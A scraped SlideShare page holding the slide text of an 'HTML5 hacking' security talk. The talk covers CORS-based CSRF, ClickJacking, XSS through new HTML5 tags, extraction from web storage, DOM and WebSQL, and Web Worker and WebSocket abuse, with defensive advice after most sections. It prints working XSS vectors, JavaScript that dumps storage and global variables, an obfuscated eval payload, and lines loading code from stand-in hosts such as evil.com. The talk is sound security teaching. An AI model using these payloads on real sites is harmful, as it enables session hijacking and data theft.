HTTP protocol and Streams Security
 

More from Blueinfy Solutions

Mobile Application Scan and Testing
Mobile Application Scan and TestingMobile Application Scan and Testing
Mobile Application Scan and Testing
Blueinfy Solutions
 
Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013
Blueinfy Solutions
 
iOS Application Security Testing
iOS Application Security TestingiOS Application Security Testing
iOS Application Security Testing
Blueinfy Solutions
 
Android secure coding
Android secure codingAndroid secure coding
Android secure coding
Blueinfy Solutions
 
Android attacks
Android attacksAndroid attacks
Android attacks
Blueinfy Solutions
 
Automation In Android & iOS Application Review
Automation In Android & iOS 	Application Review�Automation In Android & iOS 	Application Review�
Automation In Android & iOS Application Review
Blueinfy Solutions
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
Blueinfy Solutions
 
Defending against Injections
Defending against InjectionsDefending against Injections
Defending against Injections
Blueinfy Solutions
 
Blind SQL Injection
Blind SQL InjectionBlind SQL Injection
Blind SQL Injection
Blueinfy Solutions
 
SQL injection basics
SQL injection basicsSQL injection basics
SQL injection basics
Blueinfy Solutions
 
Advanced applications-architecture-threats
Advanced applications-architecture-threatsAdvanced applications-architecture-threats
Advanced applications-architecture-threats
Blueinfy Solutions
 

More from Blueinfy Solutions (11)

Mobile Application Scan and Testing
Mobile Application Scan and TestingMobile Application Scan and Testing
Mobile Application Scan and Testing
 
Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013
 
iOS Application Security Testing
iOS Application Security TestingiOS Application Security Testing
iOS Application Security Testing
 
Android secure coding
Android secure codingAndroid secure coding
Android secure coding
 
Android attacks
Android attacksAndroid attacks
Android attacks
 
Automation In Android & iOS Application Review
Automation In Android & iOS 	Application Review�Automation In Android & iOS 	Application Review�
Automation In Android & iOS Application Review
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
 
Defending against Injections
Defending against InjectionsDefending against Injections
Defending against Injections
 
Blind SQL Injection
Blind SQL InjectionBlind SQL Injection
Blind SQL Injection
 
SQL injection basics
SQL injection basicsSQL injection basics
SQL injection basics
 
Advanced applications-architecture-threats
Advanced applications-architecture-threatsAdvanced applications-architecture-threats
Advanced applications-architecture-threats
 

Recently uploaded

Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Tosin Akinosho
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
Antonios Katsarakis
 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
AstuteBusiness
 
Public CyberSecurity Awareness Presentation 2024.pptx
Public CyberSecurity Awareness Presentation 2024.pptxPublic CyberSecurity Awareness Presentation 2024.pptx
Public CyberSecurity Awareness Presentation 2024.pptx
marufrahmanstratejm
 
JavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green MasterplanJavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green Masterplan
Miro Wengner
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - HiikeSystem Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
Hiike
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
Jason Packer
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Safe Software
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
tolgahangng
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
Tatiana Kojar
 
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
MichaelKnudsen27
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
Zilliz
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
Zilliz
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
Ivanti
 
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development ProvidersYour One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
akankshawande
 
FREE A4 Cyber Security Awareness Posters-Social Engineering part 3
FREE A4 Cyber Security Awareness  Posters-Social Engineering part 3FREE A4 Cyber Security Awareness  Posters-Social Engineering part 3
FREE A4 Cyber Security Awareness Posters-Social Engineering part 3
Data Hops
 
Trusted Execution Environment for Decentralized Process Mining
Trusted Execution Environment for Decentralized Process MiningTrusted Execution Environment for Decentralized Process Mining
Trusted Execution Environment for Decentralized Process Mining
LucaBarbaro3
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
saastr
 

Recently uploaded (20)

Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
 
Public CyberSecurity Awareness Presentation 2024.pptx
Public CyberSecurity Awareness Presentation 2024.pptxPublic CyberSecurity Awareness Presentation 2024.pptx
Public CyberSecurity Awareness Presentation 2024.pptx
 
JavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green MasterplanJavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green Masterplan
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - HiikeSystem Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
 
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
 
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development ProvidersYour One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
 
FREE A4 Cyber Security Awareness Posters-Social Engineering part 3
FREE A4 Cyber Security Awareness  Posters-Social Engineering part 3FREE A4 Cyber Security Awareness  Posters-Social Engineering part 3
FREE A4 Cyber Security Awareness Posters-Social Engineering part 3
 
Trusted Execution Environment for Decentralized Process Mining
Trusted Execution Environment for Decentralized Process MiningTrusted Execution Environment for Decentralized Process Mining
Trusted Execution Environment for Decentralized Process Mining
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
 

HTML5 hacking

  • 2. API (Media, Geo etc.) & Messaging Plug-In Modern Browser Model HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 3. HTML5 – App Layers • Presentation – HTML5 (Tags & Events – new model) • Process & Logic – JavaScript, Document Object Model (DOM - 3), Events, Parsers/Threads etc. • Network & Access – XHR – Level 2 – WebSockets – Plugin-Sockets • Core Policies – SOP – Sandboxing for iframe – CORS
  • 4. • CORS/SOP – Data transfer & Origin issues • Web Messaging – Cross Domain calls • Web Workers – Domain calls & Logic issues • LocalStorage – Information leakage & Identity • Web SQL – Offline & Data theft • UI/HTML5 – UI Redressing (mixed with CORS) • DOM/XHR – Several issues • APIs - Geo-Location, Sockets, Drag-Drop Abuse Threat Model & HTML5 Components
  • 5. Attacks - Stealth and Silent … A1 - CORS Attacks & CSRF A2 - ClickJacking, CORJacking and UI exploits A3 - XSS with HTML5 tags, attributes and events A4 - Web Storage and DOM information extraction A5 - SQLi & Blind Enumeration A6 - Web Messaging and Web Workers injections A7 - DOM based XSS with HTML5 & Messaging A8 - Third party/Offline HTML Widgets and Gadgets A9 - Web Sockets and Attacks A10 - Protocol/Schema/APIs attacks with HTML5 5
  • 6. API (Media, Geo etc.) & Messaging Plug-In A1 - CORS Attacks & CSRF HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 7. HTML5, CORS & XHR • Before HTML5 – XHR was possible to same origin only (SOP applicable) • HTML5 – allows cross origin calls with XHR- Level 2 calls • CORS – Cross Origin Resource Sharing needs to be followed (Option/Preflight calls) • Adding extra HTTP header (Access-Control- Allow-Origin and few others) 7
  • 8. HTTP Headers • Request Origin Access-Control-Request-Method (preflight) Access-Control-Request-Headers (preflight) • Response Access-Control-Allow-Origin Access-Control-Allow-Credentials Access-Control-Allow-Expose-Headers Access-Control-Allow-Max-Age (preflight) Access-Control-Allow-Allow-Methods (preflight) Access-Control-Allow-Allow-Headers (preflight) 8
  • 9. • CSRF++ - powered by XHR-L2 • XML/JSON Cross Domain stream injection • CORS preflight bypass – content-type • Internal network scanning and tunneling • Information harvesting (internal crawling) • Stealth browser shell – post XSS (Allow origin- *) • Forcing cookie replay by “withCredentials” • Business functionality abuse (upload and streams) Stealth threats
  • 10. CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server Login request (HTTPS) Session cookie Client/Victim Browser User establishing Session
  • 11. CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server Placing an order (JSON services) Success Client/Victim Browser User making a buy over HTTP Browser using XHR Call JavaScript
  • 12. CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server Client/Victim Browser Session is still live – not yet logged out Attacker’s Site Visit Attacker’s page Attacker sends CSRF payload Leveraging XHR Call • Content-type to avoid pre flight • “withCredentials” set to true
  • 14. CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server XHR initiates HTTP buy request Success – cookie replayed Client/Victim Browser Attacker’s Site Visit Attacker’s page Attacker sends CSRF payload Hence, • Without victim’s consent or notice • Stealth HTTP request generated • Silent Exploitation takes place Got it
  • 16. • Powerful XHR-Level 2 call allows file upload on the fly. • Interestingly – possible to craft file through JavaScript and post on the server – if CSRF token is not there. • Example, your profile is having a photograph of yours and you visit attacker site that photo changes to something else • More serious threat, exploiting actual business functionalities... CSRF/Upload
  • 17. CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server Uploading bulk orders Success Client/Victim Browser Business layer function of uploading Browser is having Form (multi-part)
  • 19. CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server XHR initiates HTTP multi-part - Upload Success – cookie replayed Client/Victim Browser Attacker’s Site Visit Attacker’s page Attacker sends CSRF payload Hence, • Without victim’s consent or notice • Stealth HTTP Upload takes place • Silent Exploitation… Got it
  • 21. Internal Scan/Crawl for CORS • XHR2 – allows full internal scanning capacity • If internal resource is set to “*” for Access-Control- Allow-Origin – Game Over!!! • Attacker can craft a page for box behind firewall, visit the page – XHR gets loaded and start crawling internal information with back tunnel • Harvest and POST back to the server • All JavaScript – supported by all HTML5 browsers • Also can be mixed with timing attacks • Limited crawl – “withCredentials” will not work … 21
  • 22. Internal Scan/Crawl for CORS Internal Web/App Server Internal Web Mail Internal HR Application Client/Victim Browser Attacker’s Site InternetInternet IntranetIntranet CSRF Payload And stealth channel
  • 24. • Scan and look for – Content-Type checking on server side – CORS policy scan – Form and Upload with tokens or not • Defense and Countermeasures – Secure libraries for streaming HTML5/Web 2.0 content – CSRF protections – Stronger CORS implementation Scan and Defend
  • 25. API (Media, Geo etc.) & Messaging Plug-In A2 - ClickJacking, CORJacking and UI exploits HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 26. Click/COR-Jacking • UI Redressing (Click/Tab/Event Jacking) attack vectors are popular ways to abuse cross domain HTTP calls and events. • HTML5 and RIA applications are having various different resources like Flash files, Silverlight, video, audio etc. • If DOM is forced to change underlying resource on the fly and replaced by cross origin/domain resource then it causes Cross Origin Resource Jacking (CROJacking). 26
  • 27. • Iframe is having new attributed called sandbox • It allows frame isolation • Diabling JavaScript on cross domain while loading – bypassing frame bursting script – <iframe src="http://192.168.100.21/" sandbox="allow-same-origin allow-scripts" height=“x" width=“x"> - Script will run… – <iframe src="http://192.168.100.21/" sandbox="allow-same-origin" height="500" width="500"> - script will not run – ClickJacking Sandbox – HTML5
  • 28. CORJacking • It is possible to have some integrated attacks – DOM based XSS – CSRF – Flash • DOM based issue can change flash/swf file – it can be changed at run time – user will not come to know .. • Example – document.getElementsByName(“login").item(0).src = "http://evil/login.swf"
  • 29. CORJacking • Possible with other types of resources as well • Also, reverse CORJacking is a possible threat 29
  • 30. Double eval – eval the eval • Payload - document.getElementsByName('Login').ite m(0).src='http://192.168.100.200:8080/flex/ Loginn/Loginn.swf‘ • Converting for double eval to inject ‘ and “ etc… – eval(String.fromCharCode(100,111,99,117,109,101,110,116, 46,103,101,116,69,108,101,109,101,110,116,115,66,121,78, 97,109,101,40,39,76,111,103,105,110,39,41,46,105,116,101, 109,40,48,41,46,115,114,99,61,39,104,116,116,112,58,47,47 ,49,57,50,46,49,54,56,46,49,48,48,46,50,48,48,58,56,48,56,4 8,47,102,108,101,120,47,76,111,103,105,110,110,47,76,111, 103,105,110,110,46,115,119,102,39))
  • 31. Similar with … • It is possible to have some integrated attacks – DOM based XSS – CSRF – Silvelight files • DOM based issue can change xap file – it can be changed at run time – user will not come to know .. • Example – document.getElementsByName(“login").item(0).src = "http://evil/login.xap"
  • 32. • Scan and look for – ClickJacking defense code scanning – Using X-FRAME-OPTIONS • Defense and Countermeasures – Better control on CORS – Creating self aware components and loading after checking the domain Scan and Defend
  • 33. API (Media, Geo etc.) & Messaging Plug-In A3 - XSS with HTML5 tags, attributes and events HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 34. HTML5 – Tags/Attributes/Events • Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys) • Attributes – form, submit, autofocus, sandbox, manifest, rel etc. • Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. 34
  • 35. HTML5 – XSS • Blacklist and filter will get bypassed • Lot of new signatures and possible ways to execute scripts • XSS can be injected from tags and events • New attributes are available for XSS payload 35
  • 36. XSS variants • Media tags • Examples – <video><source onerror="javascript:alert(1)“> – <video onerror="javascript:alert(1)"><source> 36
  • 37. XSS variants • Exploiting autofocus – <input autofocus onfocus=alert(1)> – <select autofocus onfocus=alert(1)> – <textarea autofocus onfocus=alert(1)> – <keygen autofocus onfocus=alert(1)> 37
  • 38. XSS variants • MathML issues – <math href="javascript:alert(1)">CLICKME</math> – <math> <maction actiontype="statusline#http://Blueinfy.com" xlink:href="javascript:alert(1)">CLICKME</ma ction> </math> 38
  • 39. XSS variants • Form & Button etc. – <form id="test" /><button form="test" formaction="javascript:alert(1)">test – <form><button formaction="javascript:alert(1)">test • Etc … and more … 39
  • 40. • Scan and look for – Reflected or Persistent XSS spots with HTML5 tags • Defense and Countermeasures – Have it added on your blacklist – Standard XSS protections by encoding Scan and Defend
  • 41. API (Media, Geo etc.) & Messaging Plug-In A4 - Web Storage and DOM information extraction HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 42. Web Storage Extraction • Browser has one place to store data – Cookie (limited and replayed) • HTML5 – Storage API provided (Local and Session) • Can hold global scoped variables • http://www.w3.org/TR/webstorage/ 42
  • 43. Web Storage Extraction • It is possible to steal them through XSS or via JavaScript • Session hijacking – HttpOnly of no use • getItem and setItem calls • XSS the box and scan through storage
  • 44. Blind storage enumeration if(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ console.log(i) console.log(localStorage.getItem(i)); } } • Above code allows all storage variable extraction 44
  • 45. DOM Storage • Applications run with “rich” DOM • JavaScript sets several variables and parameters while loading – GLOBALS • It has sensitive information and what if they are GLOBAL and remains during the life of application • It can be retrieved with XSS • HTTP request and response are going through JavaScripts (XHR) – what about those vars?
  • 46. Password extraction from Ajax/DOM/HTML5 routine • Here is the line of code – temp = "login.do?user="+user+"&pwd="+pwd; xmlhttp.open("GET",temp,true); xmlhttp.onreadystatechange=function()
  • 47. Blind Enumeration for(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); console.log(obj.toString()); } }catch(ex){} } 47
  • 48. Global Sensitive Information Extraction from DOM • HTML5 apps running on Single DOM • Having several key global variables, objects and array – var arrayGlobals = ['my@email.com',"12141hewvsdr9321343423 mjfdvint","test.com"]; • Post DOM based exploitation possible and harvesting all these values. 48
  • 49. Global Sensitive Information Extraction from DOM for(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var type = typeof(obj); if(type=="object"||type=="string") { console.log("Name:"+i) try{ my=JSON.stringify(obj); console.log(my) }catch(ex){} } } 49
  • 50. • Scan and look for – Scanning storage • Defense and Countermeasures – Do not store sensitive information on localStorage and Globals – XSS protection Scan and Defend
  • 51. API (Media, Geo etc.) & Messaging Plug-In A5 - SQLi & Blind Enumeration HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 52. SQL Injection • WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself. • Allows one time data loading and offline browsing capabilities. • Causes security concern and potential injection points. • Methods and calls are possible
  • 53. SQL Injection • Through JavaScript one can harvest entire local database. • Example
  • 54. Blind WebSQL Enumeration • We need following to exploit – Database object – Table structure created on SQLite – User table on which we need to run select query 54
  • 55. Blind WebSQL Enumeration var dbo; var table; var usertable; for(i in window){ obj = window[i]; try{ if(obj.constructor.name=="Database"){ dbo = obj; obj.transaction(function(tx){ tx.executeSql('SELECT name FROM sqlite_master WHERE type='table'', [],function(tx,results){ table=results; },null); }); } }catch(ex){} } if(table.rows.length>1) usertable=table.rows.item(1).name; 55
  • 56. Blind WebSQL Enumeration • We will run through all objects and get object where constructor is “Database” • We will make Select query directly to sqlite_master database • We will grab 1st table leaving webkit table on 0th entry 56
  • 58. API (Media, Geo etc.) & Messaging Plug-In A6 - Web Messaging and Web Workers injections HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 59. Web Messaging • HTML5 is having new interframe communication system called Web Messaging. • By postMessage() call parent frame/domain can call with the iframe • Iframe can be loaded on cross domain. Hence, create issues – data/information validation & data leakage by cross posting possible 59
  • 60. Web Messaging - Scenario • If postMessage() is set to * so page can be loaded in iframe and messaging can be hijacked • Also, origin is not set to fixed then again frame listen from any domian – again an issue • Stream coming needs to be checked before innerHTML or eval() • Iframe or Web Worker can glue two streams – same domain or cross domain 60
  • 61. Web Worker – Hacks! • Web Workers allows threading into HTML pages using JavaScript • No need to use JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest, and event handlers • Totally Async and well supported [initialize] var worker = new Worker('task.js'); [Messaging] worker.postMessage(); 61
  • 62. Web Worker – Hacks! 62 JavaScript Runtime Browser Platform Scope and Object – No DOM Access XHR, Location, Navigator etc. Regex, Array, JSON etc… Web Page Current DOM Background Thread on same page - messaging Web Worker
  • 63. Web Worker – Hacks! • Security issues – It is not allowing to load cross domain worker scripts. (http:, https:,javascript:,data : -No) – It has some typical issues • It allows the use of XHR. Hence, in-domain and CORS requests possible • It can cause DoS – if user get stream to run JavaScript in worker thread. Don’t have access to parent DOM though • Message validation needed – else DOM based XSS 63
  • 64. Web Worker – Hacks! • Exmaple <html> <button onclick="Read()">Read Last Message</button> <button onclick="stop()">Stop</button> <output id="result"></output> <script> function Read() { worker.postMessage({'cmd': 'read', 'msg': 'last'}); } function stop() { worker.postMessage({'cmd': 'stop', 'msg': 'stop it'}); alert("Worker stopped"); } var worker = new Worker('message.js'); worker.addEventListener('message', function(e) { document.getElementById('result').innerHTML = e.data; }, false); </script> </html> 64
  • 65. Web Workers – Hacks! • Possible to cause XSS – Running script – Passing hidden payload • Also, web workers can help in embedding silent running js file and can be controlled. • Can be a tool for payload delivery and control within browser framework • importScripts("http://evil.com/payload.js") – worker can run cross domain script 65
  • 66. Web Worker – Hacks! 66
  • 67. • Scan and look for – JavaScript scanning – Messaging and Worker implementation • Defense and Countermeasures – Same origin listening is a must for messaging event Scan and Defend
  • 68. API (Media, Geo etc.) & Messaging Plug-In A7 - DOM based XSS with HTML5 & Messaging HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 70. DOM based XSS - Messaging • It is a sleeping giant in the Ajax applications coupled with Web Messaging • Root cause – DOM is already loaded – Application is single page and DOM remains same – New information coming needs to be injected in using various DOM calls like eval() – Information is coming from untrusted sources – JSONP usage – Web Workers and callbacks
  • 71. AJAX with HTML5 – DOM • Ajax function would be making a back-end call • Back-end would be returning JSON stream or any other and get injected in DOM • In some libraries their content type would allow them to get loaded in browser directly • In that case bypassing DOM processing…
  • 72. • Scan and look for – DOM calls – Use of eval(), document.* calls etc. • Defense and Countermeasures – Secure JavaScript coding Scan and Defend
  • 73. API (Media, Geo etc.) & Messaging Plug-In A8 - Third party/Offline HTML Widgets and Gadgets HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 74. Offline Apps • HTML5 supports caching pages for offline usage • <html manifest="/appcache.manifest"> • List of pages gets stored • Possible to attack and cache poisoning – Untrusted network or proxy can inject malicious script – When you get on to actual app that script gets executed and keep eye on your activities 74
  • 75. HTML5 Widgets • Widgets/Gadgets/Modules – popular with HTML5 applications • Small programs runs under browser and using Web Workers and Messaging • JavaScript and HTML based components • In some cases they share same DOM – Yes, same DOM • It can cause a cross widget channels and iframe/sandbox
  • 76. Cross DOM Access Widget 1 Email Widget DOM – Shared DOM Widget 2 RSS Feed Reader Widget 3 Attacker Setting the trap HTML5 – Web Messaging and Workers
  • 77. HTML5 - Traps • It is possible to access DOM events, variables, logic etc. • Sandbox is required at the architecture layer to protect cross widget access • Segregating DOM by iframe may help • Flash based widget is having its own issues as well • Code analysis of widgets before allowing them to load
  • 78. API (Media, Geo etc.) & Messaging Plug-In A9 - Web Sockets and Attacks HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 79. Web Sockets • HTML5 allows Web Socket APIs – full duplex TCP channel through JavaScript • Allows cross domain connection like CORS • Possible threats – Back door and browser shell – Quick port scanning – Botnet and malware can leverage (one to many connections) – Sniffer based on Web Socket 79
  • 80. Internal Scanning • Allows internal scanning, setting backward hidden channel, opening calls to proxy/cache. • Some browsers have blocked these calls for security reason.
  • 81. API (Media, Geo etc.) & Messaging Plug-In A10 - Protocol/Schema/APIs attacks with HTML5 HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 82. Custom protocol/schema • HTML5 allows custom protocol and schema registration • Example – navigator.registerProtocolHandler("mailto", "http://www.foo.com/?uri=%s", “My Mail"); • It is possible to abuse this feature in certain cases • Browser follows and gets registered for same domain though 82
  • 83. • HTML5 few other APIs are interesting from security standpoint – File APIs – allows local file access and can mixed with ClickJacking and other attacks to gain client files. – Drag-Drop APIs – exploiting self XSS and few other tricks, hijacking cookies … – Lot more to explore and defend… APIs …